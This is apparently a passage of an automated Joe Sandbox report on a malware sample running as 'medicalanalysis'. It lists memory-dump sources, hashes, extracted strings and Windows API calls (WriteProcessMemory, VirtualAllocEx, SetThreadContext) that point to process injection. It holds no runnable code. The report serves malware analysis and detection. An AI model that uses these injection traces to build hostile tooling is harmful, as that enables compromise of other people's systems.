                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28997af9b9a8d02b07c4caedb49dc19a7b9decf6e13b11d6a69b1f010f94134a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C521C75A002288FDB28DF68C985BDDBBF6BB88300F1545D9E949E7351DA309E81CF61
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (_]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-188044275
                                                                                                                                                                                                                                                                                                                • Opcode ID: 28b0d2fbbf479ccdbfb83c48dc57c99936d0a934e655e49b930e4b8ada7bccdd
                                                                                                                                                                                                                                                                                                                • Instruction ID: 39658b984d275c6655071c599be81f1811d9a5390293c5a14f165929acc75214
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28b0d2fbbf479ccdbfb83c48dc57c99936d0a934e655e49b930e4b8ada7bccdd
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0224A71A002059FDB08DFA9C491AADBBF2FB89354F188059E906EB395CB71ED41CB90
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 057D138B
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857479001.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2856917881.0000000005780000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5780000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2ce0be6b469a407717e4cad10ca09109927a9bdb9b32c710c7ee92f7a973d051
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0f4f1a454a37466c738de450a024ad52f51430e619ff355105ded4ad4c58e7ea
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ce0be6b469a407717e4cad10ca09109927a9bdb9b32c710c7ee92f7a973d051
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB41AAB5D012589FCF00CFA9D984ADEFBF1BB49310F24902AE819B7210D735AA45CF64
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057D106A
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857479001.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2856917881.0000000005780000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5780000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5b6e578aaa1c5f2b028297aff8d94f8e5f47f54d2f2b1950052ef0fcafe5ea61
                                                                                                                                                                                                                                                                                                                • Instruction ID: f122da4e77fe1fab0be63355c7172a03840fbc0861ac95ce8e51eb4a5aa08893
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6e578aaa1c5f2b028297aff8d94f8e5f47f54d2f2b1950052ef0fcafe5ea61
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 133195B8D00258DFCF10DFA9D980ADEFBB1BB49310F10942AE815BB210D735A946CF68
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 04AA103C
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2853288774.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_4aa0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: bc9108c318668d1fe08caeb3aa339eafa56d47030595b6dacf3fbef09b0868ff
                                                                                                                                                                                                                                                                                                                • Instruction ID: f945f39d7290749c044457741b0713a7776d9fb1fc3d120333c5f22649cdf70a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc9108c318668d1fe08caeb3aa339eafa56d47030595b6dacf3fbef09b0868ff
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0631C8B8D00258AFDF10CFA9D884AEEFBB0FB49310F20942AE815B7210D775A946CF54
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 04AA103C
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2853288774.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_4aa0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7003c66ffc7c607e6de5b89b22841f7a920f30c2d93b79c1ba30f10ee009463d
                                                                                                                                                                                                                                                                                                                • Instruction ID: cd32dc27be43197d5a516c11e84d2891a3c9b230d8d4c11af48c28a7a10ef246
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7003c66ffc7c607e6de5b89b22841f7a920f30c2d93b79c1ba30f10ee009463d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A3197B8D01258AFDF10CFA9D984ADEFBB1FB49310F24942AE814B7210D735A946CF94
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 057D09AF
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857479001.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2856917881.0000000005780000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5780000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 04732f87f027203a1b0c9c3912a711d709d19a1b10e1f2aabcee0295fe33dfa7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5cf4d0680f5f0b304322e4dc4dbdec3bdf87e0894c80b4243b0d2fab8a026f43
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04732f87f027203a1b0c9c3912a711d709d19a1b10e1f2aabcee0295fe33dfa7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8931DCB4D012589FDB10CFA9D888AEEFBF0BB49310F24802AE405B7250D738A945CF64
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2859495393.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5a30000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3f079720185b1a2ce181e6ebbf6644144d38aaa705a7cc09beac8f80dd33a5a7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0d0447ecfebaf5aa79940f789c05ccfdf515188b0bb1885196d7d1b3a24f2183
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f079720185b1a2ce181e6ebbf6644144d38aaa705a7cc09beac8f80dd33a5a7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5031D9B5D012189FCB10CFA9D981ADEFBF5AB49320F14842AE804B7210C735A946CFA4
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2859495393.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5a30000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3a638ea46e1cec155bbd1c6a62c1ac5527311e30d0b146127b8b30554b490e0c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3b4929b9adb00f9194140dbebfab2923dd582a085c465dc18c189d4e9b619ef8
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a638ea46e1cec155bbd1c6a62c1ac5527311e30d0b146127b8b30554b490e0c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F31DBB5D012589FCB10CFA9D984ADEFBF5BF49320F14842AE814B7210C735A946CFA4
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: ,aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3092978723
                                                                                                                                                                                                                                                                                                                • Opcode ID: 51825e90c648fcb5b2f289d75f467b5fef96ba433b34795aacdf3003667dea09
                                                                                                                                                                                                                                                                                                                • Instruction ID: 47f7f6a91cc4aaee1fba9a50dd2bf8fd89883d2cc945da4b9959ba86e558216e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51825e90c648fcb5b2f289d75f467b5fef96ba433b34795aacdf3003667dea09
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9C14C75A002188FDB18DF68C945BEDBBF6AF88700F158099E909E7365CA31DD858F61
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1259897404
                                                                                                                                                                                                                                                                                                                • Opcode ID: 490dd0cb4ffe2b6a132c80bdf64d078dcc64559ccfa2c2446a5173de0b2fc559
                                                                                                                                                                                                                                                                                                                • Instruction ID: b7644bf48763af84e4b98844dcb3009beb239afd290ebed8e381229d3c8daa9a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 490dd0cb4ffe2b6a132c80bdf64d078dcc64559ccfa2c2446a5173de0b2fc559
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2B1EA35A10218DFCB08DFA8D899D9DBBB2FF89300F558155E906AB365DB31EC42CB81
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: PH]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3168235125
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0f16c39cd13cc8276ae6d7809734a86069ae228bbedd2d5df71b97364bd28c64
                                                                                                                                                                                                                                                                                                                • Instruction ID: a218f4bcb17701a09bbb6265c0c246e28f51ff750579ba300b95c954d14e5c63
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f16c39cd13cc8276ae6d7809734a86069ae228bbedd2d5df71b97364bd28c64
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5D19B74D04668CFDB64DF69CC98BA9BBB1BB48309F1081EAD40DA3251DBB45AC6CF01
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Pl]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-2207481929
                                                                                                                                                                                                                                                                                                                • Opcode ID: 64bc19c93fce4c670e9f1de07b9ef549db854c2431abe64715f71d88e32966de
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2893755548fef1ea88515c16c8e9cf0d97f939628770de094fbec4879fbbb838
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64bc19c93fce4c670e9f1de07b9ef549db854c2431abe64715f71d88e32966de
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19911434B001098FDB08DF28C594AAA7BF6BF8A714F1440A9E906DB3B5DB71ED41CB91
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                                                                                                                                                • Opcode ID: df839e991062df1093fe9477215dc0ec781db6287151a9fd50b03d253f006453
                                                                                                                                                                                                                                                                                                                • Instruction ID: c4bb63fd558f69241dae234b4f8c7e538718ff802a00f68c3b496d324eea29f3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df839e991062df1093fe9477215dc0ec781db6287151a9fd50b03d253f006453
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E51AE31B006168FCB05DF58C484A6ABBB1FF85320F198A59E925DB341DB30FC52CB95
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: paq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3273118895
                                                                                                                                                                                                                                                                                                                • Opcode ID: bb9cc006e46ad9aaabb6d021cceef86a06c24e03a31fb3318782f3b06d328edb
                                                                                                                                                                                                                                                                                                                • Instruction ID: f3723c3140d0d0c6cdf71c7f8e42e38a7b4851c20c56a2248a6fc6c5f0c779a2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb9cc006e46ad9aaabb6d021cceef86a06c24e03a31fb3318782f3b06d328edb
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7514A76640104AFCB499FA8C944D29BFF7FF8D31071980D8E6098B276DA32DC22EB50
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: ,aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3092978723
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 04AA216F
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2853288774.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_4aa0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 04AA216F
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2853288774.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_4aa0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1259897404
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: p<]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1327301063
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857624604.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5850000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1259897404
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7f90b9f72e70ca5f7af0dd9026404928317c1a01455d14c1b295a6205716116a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 33b4ac714767ca85fbc246b2c10ec9315a122030b85bf894e752b18ae68cf5eb
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f90b9f72e70ca5f7af0dd9026404928317c1a01455d14c1b295a6205716116a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8312974D04209DFDB18CFA9D5097AEBBB2FB45325F00806AEC52A7250DB345E85CF51
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: ,aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3092978723
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4597a6f59d7e75b3bf85faddd2ff362debc8a9ef158b0d8a105faba3296037ca
                                                                                                                                                                                                                                                                                                                • Instruction ID: e2650d0b0e0faf2d1dd67029bf1af67b372a59cb3f886a5f0b0e1e39d1d49c50
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4597a6f59d7e75b3bf85faddd2ff362debc8a9ef158b0d8a105faba3296037ca
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25116A35601116CFCF14DFA9D9949AABBB5BF88301F258069E905DB361DB70EC06CB90
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: <dtq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3090548385
                                                                                                                                                                                                                                                                                                                • Opcode ID: bbfc60f6037b42af68a7c0dabd5c48c148fc2251e8e1a260d3a53e05cf8acbb5
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7b417c1136664d20cd6dc93e1097ea3d94a6ba8b141a037a82137affb7a8bf72
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbfc60f6037b42af68a7c0dabd5c48c148fc2251e8e1a260d3a53e05cf8acbb5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DF0C2767442504FC704DB38D818A6A3FE2ABCA315B2501E9E405CB3B6DA618C02CB61
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2860068737.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5d20000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: j
                                                                                                                                                                                                                                                                                                                • API String ID: 0-2137352139
                                                                                                                                                                                                                                                                                                                • Opcode ID: c87b53ebd11c885a7f4190f95647a2d9803f48cd16fa9984e42db16451ae2e78
                                                                                                                                                                                                                                                                                                                • Instruction ID: 755fd907cb1fb00d5583fbecbfffd096875648227195d988a716381c55b201c1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c87b53ebd11c885a7f4190f95647a2d9803f48cd16fa9984e42db16451ae2e78
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2611E178A042688FCF54DF18D8996DAB7B1FB49304F1051EAE849A7784DB70AE80CF51
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                                                                                                                • API String ID: 0-4251816714
